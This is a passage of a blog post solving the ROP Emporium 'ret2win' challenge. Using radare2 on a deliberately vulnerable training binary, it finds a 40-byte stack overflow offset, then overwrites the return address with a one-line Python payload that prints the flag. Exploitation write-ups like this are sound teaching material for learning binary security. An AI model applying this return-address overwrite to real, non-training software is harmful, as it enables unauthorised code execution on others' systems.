magic method<\/strong>.<\/p>\nLet’s download the binary and run the program to see what it’s looking for:<\/p>\n
\r\nandrew ~ $ wget --quiet https:\/\/ropemporium.com\/binary\/ret2win.zip\r\n\r\nandrew ~ $ unzip ret2win.zip\r\nArchive: ret2win.zip\r\n inflating: ret2win\r\n extracting: flag.txt\r\n\r\nandrew ~ $ .\/ret2win \r\nret2win by ROP Emporium\r\n64bits\r\n\r\nFor my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\r\nWhat could possibly go wrong?\r\nYou there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\r\n\r\n> hfjdsl\r\n\r\nExiting\r\n<\/pre>\nIt looks like the buffer is 32 bytes long. Let’s verify that by trying to cause a segfault:<\/p>\n
\r\nandrew ~ $ sudo dmesg -C\r\n\r\nandrew ~ $ python2 -c 'print "A"*45' | .\/ret2win \r\nret2win by ROP Emporium\r\n64bits\r\n\r\nFor my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\r\nWhat could possibly go wrong?\r\nYou there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\r\n\r\n> Segmentation fault (core dumped)\r\n\r\nandrew ~ $ dmesg -t\r\nret2win[70883]: segfault at a4141414141 ip 00000a4141414141 sp 00007ffce8c2c410 error 14 in libc-2.29.so[7f7a75623000+25000]\r\nCode: Bad RIP value.\r\n...\r\n<\/pre>\nUsing the hint on the ret2win page, I used dmesg -t <\/span>to verify that the saved return pointer was overwritten. Now that I know how to control the flow of execution I need to see which “method” to call. The objective of any of these challenges is to retrieve the contents of flag.txt. Let’s look for this “magic method” that might help us with that. I can list all of the functions with the afl <\/span>command:<\/p>\n\r\nandrew ~ $ r2 ret2win \r\n\r\n[0x00400650]> aa\r\n[Cannot analyze at 0x00400640g with sym. and entry0 (aa)\r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n\r\n[0x00400650]> afl\r\n0x00400650 1 41 entry0\r\n0x00400610 1 6 sym.imp.__libc_start_main\r\n0x00400680 4 50 -> 41 sym.deregister_tm_clones\r\n0x004006c0 4 58 -> 55 sym.register_tm_clones\r\n0x00400700 3 28 entry.fini0\r\n0x00400720 4 38 -> 35 entry.init0\r\n0x004007b5 1 92 sym.pwnme\r\n0x00400600 1 6 sym.imp.memset\r\n0x004005d0 1 6 sym.imp.puts\r\n0x004005f0 1 6 sym.imp.printf\r\n0x00400620 1 6 sym.imp.fgets\r\n0x00400811 1 32 sym.ret2win\r\n0x004005e0 1 6 sym.imp.system\r\n0x004008b0 1 2 sym.__libc_csu_fini\r\n0x004008b4 1 9 sym._fini\r\n0x00400840 4 101 sym.__libc_csu_init\r\n0x00400746 1 111 main\r\n0x00400630 1 6 sym.imp.setvbuf\r\n0x004005a0 3 26 sym._init\r\n<\/pre>\nWhen you see sym.<\/code> before something else in radare2, that’s indicating that it’s a symbol. Symbols are identified items, like functions and variables. Ignoring all the imports and other junk, we’re left with 3 functions:<\/p>\n\r\n0x004007b5 1 92 sym.pwnme\r\n0x00400811 1 32 sym.ret2win\r\n0x00400746 1 111 main\r\n<\/pre>\nObviously, we don’t need to call main() <\/span>again, but let’s take a look at the disassembly for that:<\/p>\n\r\n[0x00400650]> pdf @ main\r\n\u250c (fcn) main 111\r\n\u2502 int main (int argc, char **argv, char **envp);\r\n\u2502 ; DATA XREF from entry0 @ 0x40066d\r\n\u2502 0x00400746 push rbp\r\n\u2502 0x00400747 mov rbp, rsp\r\n\u2502 0x0040074a mov rax, qword [obj.stdout] ; obj.__TMC_END\r\n\u2502 ; [0x601060:8]=0\r\n\u2502 0x00400751 mov ecx, 0\r\n\u2502 0x00400756 mov edx, 2\r\n\u2502 0x0040075b mov esi, 0\r\n\u2502 0x00400760 mov rdi, rax\r\n\u2502 0x00400763 call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)\r\n\u2502 0x00400768 mov rax, qword [obj.stderr] ; obj.stderr__GLIBC_2.2.5\r\n\u2502 ; [0x601080:8]=0\r\n\u2502 0x0040076f mov ecx, 0\r\n\u2502 0x00400774 mov edx, 2\r\n\u2502 0x00400779 mov esi, 0\r\n\u2502 0x0040077e mov rdi, rax\r\n\u2502 0x00400781 call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)\r\n\u2502 0x00400786 mov edi, str.ret2win_by_ROP_Emporium ; 0x4008c8 ; "ret2win by ROP Emporium"\r\n\u2502 0x0040078b call sym.imp.puts ; int puts(const char *s)\r\n\u2502 0x00400790 mov edi, str.64bits ; 0x4008e0 ; "64bits\\n"\r\n\u2502 0x00400795 call sym.imp.puts ; int puts(const char *s)\r\n\u2502 0x0040079a mov eax, 0\r\n\u2502 0x0040079f call sym.pwnme\r\n\u2502 0x004007a4 mov edi, str.Exiting ; 0x4008e8 ; "\\nExiting"\r\n\u2502 0x004007a9 call sym.imp.puts ; int puts(const char *s)\r\n\u2502 0x004007ae mov eax, 0\r\n\u2502 0x004007b3 pop rbp\r\n\u2514 0x004007b4 ret\r\n<\/pre>\nI had to use the s<\/u>eek command to move to the main() <\/span>function before using the p<\/u>rint d<\/u>isassembly f<\/u>unction command. If you focus on the calls, you’ll see that it calls several imported functions as well as pwnme()<\/span>. However, it doesn’t call the ret2win() <\/span>function. Let’s take a look at that one:<\/p>\n\r\n[0x00400650]> pdf @ sym.ret2win\r\n\u250c (fcn) sym.ret2win 32\r\n\u2502 sym.ret2win ();\r\n\u2502 0x00400811 push rbp\r\n\u2502 0x00400812 mov rbp, rsp\r\n\u2502 0x00400815 mov edi, str.Thank_you__Here_s_your_flag: ; 0x4009e0 ; "Thank you! Here's your flag:"\r\n\u2502 0x0040081a mov eax, 0\r\n\u2502 0x0040081f call sym.imp.printf ; int printf(const char *format)\r\n\u2502 0x00400824 mov edi, str.bin_cat_flag.txt ; 0x4009fd ; "\/bin\/cat flag.txt"\r\n\u2502 0x00400829 call sym.imp.system ; int system(const char *string)\r\n\u2502 0x0040082e nop\r\n\u2502 0x0040082f pop rbp\r\n\u2514 0x00400830 ret\r\n<\/pre>\nHere, radare2 makes it nice & easy to see that this function will cat flag.txt<\/span>. Now I just need to overwrite the saved return address pointer with this function’s address (0x400811).<\/p>\nI’ll be using a tool in the radare2 framework, called ragg2 <\/span>that can create a debruijn pattern to figure out how far after the start of the buffer the saved return address is.<\/p>\n\r\nandrew ~ $ ragg2 -P 45 -r > pattern.txt\r\n\r\nandrew ~ $ cat pattern.txt \r\nAAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAA\r\n\r\nandrew ~ $ vim profile.rr2\r\n\r\nandrew ~ $ cat profile.rr2 \r\n#!\/usr\/bin\/rarun2\r\nstdin=pattern.txt\r\n\r\nandrew ~ $ r2 -r profile.rr2 -d ret2win \r\nProcess with PID 93862 started...\r\n= attach 93862 93862\r\nbin.baddr 0x00400000\r\nUsing 0x400000\r\nasm.bits 64\r\nContinue until 0x00400746 using 1 bpsize\r\nhit breakpoint at: 400746\r\n\r\n[0x00400746]> dc\r\nret2win by ROP Emporium\r\n64bits\r\n\r\nFor my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\r\nWhat could possibly go wrong?\r\nYou there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\r\n\r\n> child stopped with signal 11\r\n[+] SIGNAL 11 errno=0 addr=0x41414f4141 code=1 ret=0\r\n\r\n[0x41414f4141]> wopO $(dr rip)\r\n40\r\n<\/pre>\nHere’s what’s going on here:<\/p>\n
\n- Created the pattern with
ragg2<\/code> and saved it to a text file<\/li>\n- Created
profile.rr2<\/code> to tell radare2 that “pattern.txt” should be used for stdin when running a program<\/li>\n- radare2 is run in debug mode and specified the
profile.rr2<\/code> file as the rarun2 profile<\/li>\n- Used the d<\/span>ebug c<\/span>ontinue command to continue execution<\/li>\n
- Used the w<\/span>rite o<\/span>ut p<\/span>attern at O<\/span>ffset command and a little Bash command substitution to get the register value of RIP<\/li>\n<\/ul>\n
Now that I have the offset (40 bytes), I can build my exploit:<\/p>\n
\r\nandrew ~ $ python3 -c 'print("A"*40 + "\\x11\\x08\\x40", end="")' | .\/ret2win\r\nret2win by ROP Emporium\r\n64bits\r\n\r\nFor my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\r\nWhat could possibly go wrong?\r\nYou there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\r\n\r\n> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}\r\n<\/pre>\nWhile this particular challenge didn’t really involve return oriented programming, it’s still a good place to start, especially with learning a new tool like radare2.<\/p>\n","protected":false},"excerpt":{"rendered":"
Locate a method within the binary that you want to call and do so by overwriting a saved return address on the stack … Continue readingROP Emporium | ret2win Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-892","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/892","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=892"}],"version-history":[{"count":34,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/892\/revisions"}],"predecessor-version":[{"id":963,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/892\/revisions\/963"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=892"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=892"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=892"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}